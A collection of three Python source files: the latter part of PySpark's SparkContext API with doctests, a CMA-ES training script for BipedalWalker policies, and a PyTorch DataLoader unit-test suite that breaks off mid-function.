hdfs://a-hdfs-path/part-nnnnn
Do C{rdd = sparkContext.wholeTextFiles("hdfs://a-hdfs-path")},
then C{rdd} contains::
(a-hdfs-path/part-00000, its content)
(a-hdfs-path/part-00001, its content)
...
(a-hdfs-path/part-nnnnn, its content)
.. note:: Small files are preferred, as each file will be loaded
fully in memory.
>>> dirPath = os.path.join(tempdir, "files")
>>> os.mkdir(dirPath)
>>> with open(os.path.join(dirPath, "1.txt"), "w") as file1:
... _ = file1.write("1")
>>> with open(os.path.join(dirPath, "2.txt"), "w") as file2:
... _ = file2.write("2")
>>> textFiles = sc.wholeTextFiles(dirPath)
>>> sorted(textFiles.collect())
[(u'.../1.txt', u'1'), (u'.../2.txt', u'2')]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.wholeTextFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(use_unicode), UTF8Deserializer(use_unicode)))
def binaryFiles(self, path, minPartitions=None):
"""
.. note:: Experimental
Read a directory of binary files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system URI
as a byte array. Each file is read as a single record and returned
in a key-value pair, where the key is the path of each file, the
value is the content of each file.
.. note:: Small files are preferred; large files are also allowed, but
may cause poor performance.
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.binaryFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(), NoOpSerializer()))
def binaryRecords(self, path, recordLength):
"""
.. note:: Experimental
Load data from a flat binary file, assuming each record is a set of numbers
with the specified numerical format (see ByteBuffer), and the number of
bytes per record is constant.
:param path: Directory to the input data files
:param recordLength: The length at which to split the records
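A minimal sketch (the path and the 8-byte little-endian double layout are
assumptions about the data, not requirements of the API)::

    import struct
    recs = sc.binaryRecords("hdfs://host/path/data.bin", recordLength=8)
    values = recs.map(lambda rec: struct.unpack("<d", rec)[0])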
"""
return RDD(self._jsc.binaryRecords(path, recordLength), self, NoOpSerializer())
def _dictToJavaMap(self, d):
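# Copy a (possibly None) Python dict into a java.util.HashMap via Py4J so it
# can be handed to the JVM-side Hadoop helpers below.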
jm = self._jvm.java.util.HashMap()
if not d:
d = {}
for k, v in d.items():
jm[k] = v
return jm
def sequenceFile(self, path, keyClass=None, valueClass=None, keyConverter=None,
valueConverter=None, minSplits=None, batchSize=0):
"""
Read a Hadoop SequenceFile with arbitrary key and value Writable class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is as follows:
1. A Java RDD is created from the SequenceFile or other InputFormat, and the key
and value Writable classes
2. Serialization is attempted via Pyrolite pickling
3. If this fails, the fallback is to call 'toString' on each key and value
4. C{PickleSerializer} is used to deserialize pickled objects on the Python side
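A minimal usage sketch (the HDFS path is a placeholder; the Writable classes
are the ones mentioned below)::

    rdd = sc.sequenceFile("hdfs://host/path/data.seq",
                          keyClass="org.apache.hadoop.io.Text",
                          valueClass="org.apache.hadoop.io.LongWritable")
    pairs = rdd.collect()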
:param path: path to the sequence file
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter:
:param valueConverter:
:param minSplits: minimum splits in dataset
(default min(2, sc.defaultParallelism))
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
minSplits = minSplits or min(self.defaultParallelism, 2)
jrdd = self._jvm.PythonRDD.sequenceFile(self._jsc, path, keyClass, valueClass,
keyConverter, valueConverter, minSplits, batchSize)
return RDD(jrdd, self)
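# A minimal usage sketch (added for illustration; the path and Writable classes are
# hypothetical): keys and values are converted to Python objects via Pyrolite as
# described in the mechanism above.
#
#   rdd = sc.sequenceFile("hdfs://a-hdfs-path/seq-dir",
#                         keyClass="org.apache.hadoop.io.Text",
#                         valueClass="org.apache.hadoop.io.IntWritable")
#   rdd.collect()  # e.g. [(u'key1', 1), (u'key2', 2)]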
def newAPIHadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def newAPIHadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
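# A minimal usage sketch (added for illustration; the configuration values are
# hypothetical): since newAPIHadoopRDD takes no path argument, the input directory
# is supplied through the Hadoop configuration dict.
#
#   conf = {"mapreduce.input.fileinputformat.inputdir": "hdfs://a-hdfs-path"}
#   rdd = sc.newAPIHadoopRDD(
#       "org.apache.hadoop.mapreduce.lib.input.TextInputFormat",
#       "org.apache.hadoop.io.LongWritable",
#       "org.apache.hadoop.io.Text",
#       conf=conf)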
def hadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java.
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def _checkpointFile(self, name, input_deserializer):
jrdd = self._jsc.checkpointFile(name)
return RDD(jrdd, self, input_deserializer)
@ignore_unicode_prefix
def union(self, rdds):
"""
Build the union of a list of RDDs.
This supports unions() of RDDs with different serialized formats,
although this forces them to be reserialized using the default
serializer:
>>> path = os.path.join(tempdir, "union-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello']
>>> parallelized = sc.parallelize(["World!"])
>>> sorted(sc.union([textFile, parallelized]).collect())
[u'Hello', 'World!']
"""
first_jrdd_deserializer = rdds[0]._jrdd_deserializer
if any(x._jrdd_deserializer != first_jrdd_deserializer for x in rdds):
rdds = [x._reserialize() for x in rdds]
first = rdds[0]._jrdd
rest = [x._jrdd for x in rdds[1:]]
return RDD(self._jsc.union(first, rest), self, rdds[0]._jrdd_deserializer)
def broadcast(self, value):
"""
Broadcast a read-only variable to the cluster, returning a
L{Broadcast<pyspark.broadcast.Broadcast>}
object for reading it in distributed functions. The variable will
be sent to each cluster only once.
"""
return Broadcast(self, value, self._pickled_broadcast_vars)
def accumulator(self, value, accum_param=None):
"""
Create an L{Accumulator} with the given initial value, using a given
L{AccumulatorParam} helper object to define how to add values of the
data type if provided. Default AccumulatorParams are used for integers
and floating-point numbers if you do not provide one. For other types,
a custom AccumulatorParam can be used.
"""
if accum_param is None:
if isinstance(value, int):
accum_param = accumulators.INT_ACCUMULATOR_PARAM
elif isinstance(value, float):
accum_param = accumulators.FLOAT_ACCUMULATOR_PARAM
elif isinstance(value, complex):
accum_param = accumulators.COMPLEX_ACCUMULATOR_PARAM
else:
raise TypeError("No default accumulator param for type %s" % type(value))
SparkContext._next_accum_id += 1
return Accumulator(SparkContext._next_accum_id - 1, value, accum_param)
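# Illustrative sketch of a custom AccumulatorParam for list-valued accumulators
# (the class name VectorAccumulatorParam is made up for this example):
#
#   from pyspark.accumulators import AccumulatorParam
#
#   class VectorAccumulatorParam(AccumulatorParam):
#       def zero(self, value):
#           return [0.0] * len(value)
#       def addInPlace(self, v1, v2):
#           return [a + b for a, b in zip(v1, v2)]
#
#   acc = sc.accumulator([0.0, 0.0, 0.0], VectorAccumulatorParam())
#   sc.parallelize([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]).foreach(lambda x: acc.add(x))
#   acc.value  # [5.0, 7.0, 9.0]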
def addFile(self, path, recursive=False):
"""
Add a file to be downloaded with this Spark job on every node.
The C{path} passed can be either a local file, a file in HDFS
(or other Hadoop-supported filesystems), or an HTTP, HTTPS or
FTP URI.
To access the file in Spark jobs, use
L{SparkFiles.get(fileName)<pyspark.files.SparkFiles.get>} with the
filename to find its download location.
A directory can be given if the recursive option is set to True.
Currently directories are only supported for Hadoop-supported filesystems.
>>> from pyspark import SparkFiles
>>> path = os.path.join(tempdir, "test.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("100")
>>> sc.addFile(path)
>>> def func(iterator):
... with open(SparkFiles.get("test.txt")) as testFile:
... fileVal = int(testFile.readline())
... return [x * fileVal for x in iterator]
>>> sc.parallelize([1, 2, 3, 4]).mapPartitions(func).collect()
[100, 200, 300, 400]
"""
self._jsc.sc().addFile(path, recursive)
def addPyFile(self, path):
"""
Add a .py or .zip dependency for all tasks to be executed on this
SparkContext in the future. The C{path} passed can be either a local
file, a file in HDFS (or other Hadoop-supported filesystems), or an
HTTP, HTTPS or FTP URI.
"""
self.addFile(path)
(dirname, filename) = os.path.split(path) # dirname may be directory or HDFS/S3 prefix
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
# for tests in local mode
sys.path.insert(1, os.path.join(SparkFiles.getRootDirectory(), filename))
if sys.version > '3':
import importlib
importlib.invalidate_caches()
def setCheckpointDir(self, dirName):
"""
Set the directory under which RDDs are going to be checkpointed. The
directory must be a HDFS path if running on a cluster.
"""
self._jsc.sc().setCheckpointDir(dirName)
def _getJavaStorageLevel(self, storageLevel):
"""
Returns a Java StorageLevel based on a pyspark.StorageLevel.
"""
if not isinstance(storageLevel, StorageLevel):
raise Exception("storageLevel must be of type pyspark.StorageLevel")
newStorageLevel = self._jvm.org.apache.spark.storage.StorageLevel
return newStorageLevel(storageLevel.useDisk,
storageLevel.useMemory,
storageLevel.useOffHeap,
storageLevel.deserialized,
storageLevel.replication)
def setJobGroup(self, groupId, description, interruptOnCancel=False):
"""
Assigns a group ID to all the jobs started by this thread until the group ID is set to a
different value or cleared.
Often, a unit of execution in an application consists of multiple Spark actions or jobs.
Application programmers can use this method to group all those jobs together and give a
group description. Once set, the Spark web UI will associate such jobs with this group.
The application can use L{SparkContext.cancelJobGroup} to cancel all
running jobs in this group.
>>> import threading
>>> from time import sleep
>>> result = "Not Set"
>>> lock = threading.Lock()
>>> def map_func(x):
... sleep(100)
... raise Exception("Task should have been cancelled")
>>> def start_job(x):
... global result
... try:
... sc.setJobGroup("job_to_cancel", "some description")
... result = sc.parallelize(range(x)).map(map_func).collect()
... except Exception as e:
... result = "Cancelled"
... lock.release()
>>> def stop_job():
... sleep(5)
... sc.cancelJobGroup("job_to_cancel")
>>> suppress = lock.acquire()
>>> suppress = threading.Thread(target=start_job, args=(10,)).start()
>>> suppress = threading.Thread(target=stop_job).start()
>>> supress = lock.acquire()
>>> print(result)
Cancelled
If interruptOnCancel is set to true for the job group, then job cancellation will result
in Thread.interrupt() being called on the job's executor threads. This is useful to help
ensure that the tasks are actually stopped in a timely manner, but is off by default due
to HDFS-1208, where HDFS may respond to Thread.interrupt() by marking nodes as dead.
"""
self._jsc.setJobGroup(groupId, description, interruptOnCancel)
def setLocalProperty(self, key, value):
"""
Set a local property that affects jobs submitted from this thread, such as the
Spark fair scheduler pool.
"""
self._jsc.setLocalProperty(key, value)
def getLocalProperty(self, key):
"""
Get a local property set in this thread, or null if it is missing. See
L{setLocalProperty}
"""
return self._jsc.getLocalProperty(key)
def setJobDescription(self, value):
"""
Set a human readable description of the current job.
"""
self._jsc.setJobDescription(value)
def sparkUser(self):
"""
Get SPARK_USER for user who is running SparkContext.
"""
return self._jsc.sc().sparkUser()
def cancelJobGroup(self, groupId):
"""
Cancel active jobs for the specified group. See L{SparkContext.setJobGroup}
for more information.
"""
self._jsc.sc().cancelJobGroup(groupId)
def cancelAllJobs(self):
"""
Cancel all jobs that have been scheduled or are running.
"""
self._jsc.sc().cancelAllJobs()
def statusTracker(self):
"""
Return :class:`StatusTracker` object
"""
return StatusTracker(self._jsc.statusTracker())
def runJob(self, rdd, partitionFunc, partitions=None, allowLocal=False):
"""
Executes the given partitionFunc on the specified set of partitions,
returning the result as an array of elements.
If 'partitions' is not specified, this will run over all partitions.
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part])
[0, 1, 4, 9, 16, 25]
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part], [0, 2], True)
[0, 1, 16, 25]
"""
if partitions is None:
partitions = range(rdd._jrdd.partitions().size())
# Implementation note: This is implemented as a mapPartitions followed
# by runJob() in order to avoid having to pass a Python lambda into
# SparkContext#runJob.
mappedRDD = rdd.mapPartitions(partitionFunc)
sock_info = self._jvm.PythonRDD.runJob(self._jsc.sc(), mappedRDD._jrdd, partitions)
return list(_load_from_socket(sock_info, mappedRDD._jrdd_deserializer))
def show_profiles(self):
""" Print the profile stats to stdout """
if self.profiler_collector is not None:
self.profiler_collector.show_profiles()
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def dump_profiles(self, path):
""" Dump the profile stats into directory `path`
"""
if self.profiler_collector is not None:
self.profiler_collector.dump_profiles(path)
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def getConf(self):
conf = SparkConf()
conf.setAll(self._conf.getAll())
return conf
def _test():
import atexit
import doctest
import tempfile
globs = globals().copy()
globs['sc'] = SparkContext('local[4]', 'PythonTest')
globs['tempdir'] = tempfile.mkdtemp()
atexit.register(lambda: shutil.rmtree(globs['tempdir']))
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
cma_es.py
|
import cma
import numpy as np
import gym
import torch.multiprocessing as mp
from torch.multiprocessing import SimpleQueue
import pickle
import sys
from model import *
from utils import *
from config import *
import time
class Worker(mp.Process):
def __init__(self, id, state_normalizer, task_q, result_q, stop, config):
mp.Process.__init__(self)
self.task_queue = task_q
self.result_q = result_q
self.evaluator = Evaluator(config, state_normalizer)
self.id = id
self.stop = stop
def run(self):
np.random.seed()
while not self.stop.value:
if self.task_queue.empty():
continue
id, solution = self.task_queue.get()
fitness, steps = self.evaluator.eval(solution)
self.result_q.put((id, fitness, steps))
def train(config):
task_queue = SimpleQueue()
result_queue = SimpleQueue()
stop = mp.Value('i', False)
stats = SharedStats(config.state_dim)
normalizers = [StaticNormalizer(config.state_dim) for _ in range(config.num_workers)]
for normalizer in normalizers:
normalizer.offline_stats.load(stats)
workers = [Worker(id, normalizers[id], task_queue, result_queue, stop, config) for id in range(config.num_workers)]
for w in workers: w.start()
opt = cma.CMAOptions()
opt['tolfun'] = -config.target
opt['popsize'] = config.pop_size
opt['verb_disp'] = 0
opt['verb_log'] = 0
opt['maxiter'] = sys.maxsize
es = cma.CMAEvolutionStrategy(config.initial_weight, config.sigma, opt)
total_steps = 0
initial_time = time.time()
training_rewards = []
training_steps = []
training_timestamps = []
test_mean, test_ste = test(config, config.initial_weight, stats)
logger.info('total steps %d, %f(%f)' % (total_steps, test_mean, test_ste))
training_rewards.append(test_mean)
training_steps.append(0)
training_timestamps.append(0)
while True:
solutions = es.ask()
for id, solution in enumerate(solutions):
task_queue.put((id, solution))
while not task_queue.empty():
continue
result = []
while len(result) < len(solutions):
if result_queue.empty():
continue
result.append(result_queue.get())
result = sorted(result, key=lambda x: x[0])
total_steps += np.sum([r[2] for r in result])
cost = [r[1] for r in result]
best_solution = solutions[np.argmin(cost)]
elapsed_time = time.time() - initial_time
test_mean, test_ste = test(config, best_solution, stats)
logger.info('total steps %d, test %f(%f), best %f, elapsed time %f' %
(total_steps, test_mean, test_ste, -np.min(cost), elapsed_time))
training_rewards.append(test_mean)
training_steps.append(total_steps)
training_timestamps.append(elapsed_time)
# with open('data/%s-best_solution_%s.bin' % (TAG, config.task), 'wb') as f:
# pickle.dump(solutions[np.argmin(result)], f)
if config.max_steps and total_steps > config.max_steps:
stop.value = True
break
cost = fitness_shift(cost)
es.tell(solutions, cost)
# es.disp()
for normalizer in normalizers:
stats.merge(normalizer.online_stats)
normalizer.online_stats.zero()
for normalizer in normalizers:
normalizer.offline_stats.load(stats)
stop.value = True
for w in workers: w.join()
return [training_rewards, training_steps, training_timestamps]
def test(config, solution, stats):
normalizer = StaticNormalizer(config.state_dim)
normalizer.offline_stats.load_state_dict(stats.state_dict())
evaluator = Evaluator(config, normalizer)
evaluator.model.set_weight(solution)
rewards = []
for i in range(config.test_repetitions):
reward, _ = evaluator.single_run()
rewards.append(reward)
return np.mean(rewards), np.std(rewards) / np.sqrt(config.test_repetitions)  # mean and standard error over test runs
def multi_runs(config):
fh = logging.FileHandler('log/%s-%s.txt' % (config.tag, config.task))
fh.setLevel(logging.DEBUG)
logger.addHandler(fh)
stats = []
runs = 10
for run in range(runs):
logger.info('Run %d' % (run))
stats.append(train(config))
with open('data/%s-stats-%s.bin' % (config.tag, config.task), 'wb') as f:
pickle.dump(stats, f)
def all_tasks():
configs = []
hidden_size = 16
# config = PendulumConfig(hidden_size)
# configs.append(config)
# config = ContinuousLunarLanderConfig(hidden_size)
# configs.append(config)
config = BipedalWalkerConfig(hidden_size)
configs.append(config)
config = BipedalWalkerHardcore(hidden_size)
configs.append(config)
ps = []
for cf in configs:
cf.max_steps = int(1e7)
cf.num_workers = 8
cf.pop_size = 64
cf.sigma = 1
cf.tag = 'CMA-%d' % (hidden_size)
ps.append(mp.Process(target=multi_runs, args=(cf, )))
for p in ps: p.start()
for p in ps: p.join()
if __name__ == '__main__':
all_tasks()
|
test_dataloader.py
|
import math
import sys
import errno
import os
import ctypes
import signal
import torch
import time
import traceback
import unittest
import subprocess
from torch import multiprocessing as mp
from torch.utils.data import Dataset, TensorDataset, DataLoader, ConcatDataset
from torch.utils.data.dataset import random_split
from torch.utils.data.dataloader import default_collate, ExceptionWrapper, MANAGER_STATUS_CHECK_INTERVAL
from common import TestCase, run_tests, TEST_NUMPY, IS_WINDOWS, NO_MULTIPROCESSING_SPAWN, TEST_WITH_ROCM
# We cannot import TEST_CUDA from common_nn here, because if we do that,
# the TEST_CUDNN line from common_nn will be executed multiple times
# as well during the execution of this test suite, and it will cause
# CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
# We need spawn start method for test_manager_unclean_exit, but
# Python 2.7 doesn't allow it.
if sys.version_info[0] == 3:
# Get a multiprocessing context because some test / third party library will
# set start_method when imported, and setting again triggers RuntimeError.
mp = mp.get_context(method='spawn')
JOIN_TIMEOUT = 17.0 if IS_WINDOWS else 6.5
class TestDatasetRandomSplit(TestCase):
def test_lengths_must_equal_dataset_size(self):
with self.assertRaises(ValueError):
random_split([1, 2, 3, 4], [1, 2])
def test_splits_have_correct_size(self):
splits = random_split([1, 2, 3, 4, 5, 6], [2, 4])
self.assertEqual(len(splits), 2)
self.assertEqual(len(splits[0]), 2)
self.assertEqual(len(splits[1]), 4)
def test_splits_are_mutually_exclusive(self):
data = [5, 2, 3, 4, 1, 6]
splits = random_split(data, [2, 4])
all_values = []
all_values.extend(list(splits[0]))
all_values.extend(list(splits[1]))
data.sort()
all_values.sort()
self.assertListEqual(data, all_values)
class TestTensorDataset(TestCase):
def test_len(self):
source = TensorDataset(torch.randn(15, 10, 2, 3, 4, 5), torch.randperm(15))
self.assertEqual(len(source), 15)
def test_getitem(self):
t = torch.randn(15, 10, 2, 3, 4, 5)
l = torch.randn(15, 10)
source = TensorDataset(t, l)
for i in range(15):
self.assertEqual(t[i], source[i][0])
self.assertEqual(l[i], source[i][1])
def test_getitem_1d(self):
t = torch.randn(15)
l = torch.randn(15)
source = TensorDataset(t, l)
for i in range(15):
self.assertEqual(t[i], source[i][0])
self.assertEqual(l[i], source[i][1])
def test_single_tensor(self):
t = torch.randn(5, 10)
source = TensorDataset(t)
self.assertEqual(len(source), 5)
for i in range(5):
self.assertEqual(t[i], source[i][0])
def test_many_tensors(self):
t0 = torch.randn(5, 10, 2, 3, 4, 5)
t1 = torch.randn(5, 10)
t2 = torch.randn(5, 10, 2, 5)
t3 = torch.randn(5, 10, 3, 7)
source = TensorDataset(t0, t1, t2, t3)
self.assertEqual(len(source), 5)
for i in range(5):
self.assertEqual(t0[i], source[i][0])
self.assertEqual(t1[i], source[i][1])
self.assertEqual(t2[i], source[i][2])
self.assertEqual(t3[i], source[i][3])
class TestConcatDataset(TestCase):
def test_concat_two_singletons(self):
result = ConcatDataset([[0], [1]])
self.assertEqual(2, len(result))
self.assertEqual(0, result[0])
self.assertEqual(1, result[1])
def test_concat_two_non_singletons(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
self.assertEqual(10, len(result))
self.assertEqual(0, result[0])
self.assertEqual(5, result[5])
def test_concat_two_non_singletons_with_empty(self):
# Adding an empty dataset somewhere is correctly handled
result = ConcatDataset([[0, 1, 2, 3, 4],
[],
[5, 6, 7, 8, 9]])
self.assertEqual(10, len(result))
self.assertEqual(0, result[0])
self.assertEqual(5, result[5])
def test_concat_raises_index_error(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
with self.assertRaises(IndexError):
# this one goes to 11
result[11]
def test_add_dataset(self):
d1 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
d2 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
d3 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
result = d1 + d2 + d3
self.assertEqual(21, len(result))
self.assertEqual(0, (d1[0][0] - result[0][0]).abs().sum())
self.assertEqual(0, (d2[0][0] - result[7][0]).abs().sum())
self.assertEqual(0, (d3[0][0] - result[14][0]).abs().sum())
# Stores the first encountered exception in .exception.
# Inspired by https://stackoverflow.com/a/33599967
class ErrorTrackingProcess(mp.Process):
def __init__(self, *args, **kwargs):
super(ErrorTrackingProcess, self).__init__(*args, **kwargs)
self._pconn, self._cconn = mp.Pipe()
self._exception = None
def run(self):
# Disable stderr printing at the OS level, so that workers do not print
# to stderr.
# Can't use sys.stderr.close, otherwise Python `raise` will error with
# ValueError: I/O operation on closed file.
os.close(sys.stderr.fileno())
try:
super(ErrorTrackingProcess, self).run()
self._cconn.send(None)
except Exception as e:
self._cconn.send(ExceptionWrapper(sys.exc_info()))
raise
@property
def exception(self):
if self._pconn.poll():
self._exception = self._pconn.recv()
if self._exception is None:
return None
else:
return self._exception.exc_type(self._exception.exc_msg)
# ESRCH means that os.kill can't find an alive process
def send_signal(self, signum, ignore_ESRCH=False):
try:
os.kill(self.pid, signum)
except OSError as e:
if not ignore_ESRCH or e.errno != errno.ESRCH:
raise
class ErrorDataset(Dataset):
def __init__(self, size):
self.size = size
def __len__(self):
return self.size
class SegfaultDataset(Dataset):
def __init__(self, size):
self.size = size
def __getitem__(self, idx):
return ctypes.string_at(0)
def __len__(self):
return self.size
class SleepDataset(Dataset):
def __init__(self, size, sleep_sec):
self.size = size
self.sleep_sec = sleep_sec
def __getitem__(self, idx):
time.sleep(self.sleep_sec)
return idx
def __len__(self):
return self.size
class SeedDataset(Dataset):
def __init__(self, size):
self.size = size
def __getitem__(self, idx):
return torch.initial_seed()
def __len__(self):
return self.size
# Inspired by https://stackoverflow.com/a/26703365
# This will ensure that each worker processes at least one sample
class SynchronizedSeedDataset(Dataset):
def __init__(self, size, num_workers):
assert size >= num_workers
self.count = mp.Value('i', 0, lock=True)
self.barrier = mp.Semaphore(0)
self.num_workers = num_workers
self.size = size
def __getitem__(self, idx):
with self.count.get_lock():
self.count.value += 1
if self.count.value == self.num_workers:
self.barrier.release()
self.barrier.acquire()
self.barrier.release()
return torch.initial_seed()
def __len__(self):
return self.size
def _test_timeout():
dataset = SleepDataset(10, 10)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, timeout=1)
_ = next(iter(dataloader))
def _test_segfault():
dataset = SegfaultDataset(10)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2)
_ = next(iter(dataloader))
# test custom init function
def init_fn(worker_id):
torch.manual_seed(12345)
class TestDataLoader(TestCase):
def setUp(self):
self.data = torch.randn(100, 2, 3, 5)
self.labels = torch.randperm(50).repeat(2)
self.dataset = TensorDataset(self.data, self.labels)
def _test_sequential(self, loader):
batch_size = loader.batch_size
for i, (sample, target) in enumerate(loader):
idx = i * batch_size
self.assertEqual(sample, self.data[idx:idx + batch_size])
self.assertEqual(target, self.labels[idx:idx + batch_size])
self.assertEqual(i, math.floor((len(self.dataset) - 1) / batch_size))
def _test_shuffle(self, loader):
found_data = {i: 0 for i in range(self.data.size(0))}
found_labels = {i: 0 for i in range(self.labels.size(0))}
batch_size = loader.batch_size
for i, (batch_samples, batch_targets) in enumerate(loader):
for sample, target in zip(batch_samples, batch_targets):
for data_point_idx, data_point in enumerate(self.data):
if data_point.eq(sample).all():
self.assertFalse(found_data[data_point_idx])
found_data[data_point_idx] += 1
break
self.assertEqual(target, self.labels[data_point_idx])
found_labels[data_point_idx] += 1
self.assertEqual(sum(found_data.values()), (i + 1) * batch_size)
self.assertEqual(sum(found_labels.values()), (i + 1) * batch_size)
self.assertEqual(i, math.floor((len(self.dataset) - 1) / batch_size))
def _test_error(self, loader):
it = iter(loader)
errors = 0
while True:
try:
next(it)
except NotImplementedError:
errors += 1
except StopIteration:
self.assertEqual(errors,
math.ceil(float(len(loader.dataset)) / loader.batch_size))
return
def test_invalid_assign_after_init(self):
dl = DataLoader(self.dataset)
for attr in ('batch_size', 'sampler', 'drop_last'):
def fn():
setattr(dl, attr, {})
self.assertRaises(ValueError, fn)
def test_sequential(self):
self._test_sequential(DataLoader(self.dataset))
def test_sequential_batch(self):
self._test_sequential(DataLoader(self.dataset, batch_size=2))
def test_growing_dataset(self):
dataset = [torch.ones(4) for _ in range(4)]
dataloader_seq = DataLoader(dataset, shuffle=False)
dataloader_shuffle = DataLoader(dataset, shuffle=True)
dataset.append(torch.ones(4))
self.assertEqual(len(dataloader_seq), 5)
self.assertEqual(len(dataloader_shuffle), 5)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@unittest.skipIf(TEST_WITH_ROCM, "test doesn't currently work on the ROCm stack")
def test_sequential_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, pin_memory=True)
for input, target in loader:
self.assertTrue(input.is_pinned())
self.assertTrue(target.is_pinned())
@unittest.skipIf(TEST_WITH_ROCM, "test doesn't currently work on the ROCm stack")
def test_multiple_dataloaders(self):
loader1_it = iter(DataLoader(self.dataset, num_workers=1))
